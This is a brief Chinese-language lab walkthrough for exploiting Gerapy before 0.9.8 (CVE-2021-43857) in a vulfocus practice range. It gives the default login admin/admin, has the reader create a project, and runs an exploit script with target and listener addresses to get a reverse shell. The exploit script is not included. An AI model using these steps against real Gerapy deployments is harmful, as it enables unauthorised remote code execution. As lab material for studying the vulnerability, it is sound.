需登录应用程序,获取已创建的项目列表,如果获取不到将利用失败,然后使用项目设置,通过发送反弹shell的payload获取目标系统权限。
gerapy<0.9.8 CVE-2021-43857 vulfocus
1、启动靶场,界面如下:

2、弱口令admin/admin登录。

3、在利用之前,先创建一个项目,项目名称为test。


4、直接通过脚本利用。
python3 cve-2021-43857.py -t 192.168.10.214 -p 14949 -L 192.168.10.25 -P 4444
